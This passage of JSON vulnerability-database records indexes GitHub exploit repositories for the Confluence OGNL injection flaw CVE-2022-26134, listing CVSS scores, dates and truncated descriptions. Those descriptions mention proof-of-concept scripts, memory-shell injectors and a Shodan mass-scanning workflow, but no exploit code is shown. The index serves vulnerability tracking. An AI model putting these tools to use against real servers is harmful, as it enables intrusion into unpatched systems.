"baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-16T09:19:56", "type": "githubexploit", "title": "Exploit for Injection in 
Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-17T06:36:47", "id": "1F907E1E-A975-55B6-BAFC-80A32B2DDAE7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:17:03", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-24T19:00:25", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2022-26134"], "modified": "2023-02-09T19:30:02", "id": "506F4ED7-477B-50E3-9250-1C6A31D8C357", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:09:59", "description": "# CVE-2022-26134_Behinder_MemShell\n\n\u539f\u9879\u76ee\u5730\u5740:...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-04T06:51:47", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-02-19T08:50:35", "id": "594C33E1-9EBF-5B3B-BA76-031ACB500518", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:32:59", "description": "# [-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T23:01:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-04-14T16:51:35", "id": "FD4859A0-D69F-503C-BFDB-0C9025BDC68F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:25", "description": "# confluencePot\n\nConfluencePot is a simple honeypot for the Atla...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T15:44:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-04-18T08:06:55", "id": "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:12", "description": "# CVE-2022-26134\n \n -u URL, --url URL \u76ee\u6807url\n \n -c COMM...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T02:11:58", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-31T13:06:36", "id": "12691014-3333-5741-80A4-3357BD72D2AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:31", "description": "# CVE-2022-2613...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T02:16:56", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T02:20:41", "id": "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:29", "description": "# CVE-2022-26134 POC\n\n## Description\n```\nIn affected versions of...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T10:36:11", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-06T10:20:57", "id": "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:29", "description": "# CVE-2022-26134-Godzilla-MEMSHELL\n\n## Usage\n```\njava -jar CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T09:19:02", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-06-05T10:57:05", "id": "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "href": "", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:42", "description": "# CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T18:23:20", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-05T23:03:16", "id": "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:32", "description": "# CVE-2022-26134\nImplementation of CVE-2022-26134\n\nThis reposito...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-06-07T08:58:07", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:21:42", "id": "1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:38", "description": "# Confluence Pre-Auth Remote Code Execution via OGNL Injection (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T02:43:06", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-04-01T10:43:08", "id": "B47171B0-339A-582E-8AAC-3B18373664B7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:38", "description": "# CVE-2022-26134\n\n1) First run the shodan scripts to grabs all t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T20:35:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-12T18:28:08", "id": "7BE60530-0495-5366-846A-73B1A778DBDA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:39", "description": "# Confluence-CVE-2022-26134\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T13:51:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T01:29:57", "id": "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:40", "description": "# CVE-2022-26134\nAtlassian Conflue...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T06:57:02", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-30T13:08:13", "id": "18A205C9-C2EE-55CC-9BFD-4054390F94E9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:42", "description": "CVE-2022-26134 poc\r\n\r\n\u58f0\u660e:\u8be5POC\u4ec5\u4f9b\u4e8e\u5b66\u4e60\u4e13\u7528\uff0c\u7981\u6b62\u4e00\u5207\u8fdd\u6cd5\u64cd\u4f5c\uff0c\u5982\u679c\u8fdb\u884c\u6076\u610f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T13:41:25", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-05T13:44:25", "id": "53CC55D8-983C-5FA9-AE81-D20750A6612E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2023-06-06T15:33:53", "description": "# CVE-2022-26134 PoC\n\nConfluence Server and Data Center - CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:44:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-10T12:12:43", "id": "423DF4D5-60AF-5663-B196-2A67DD13D226", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:54", "description": "\u6279\u91cf\u9a8c\u8bc1 CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": &quo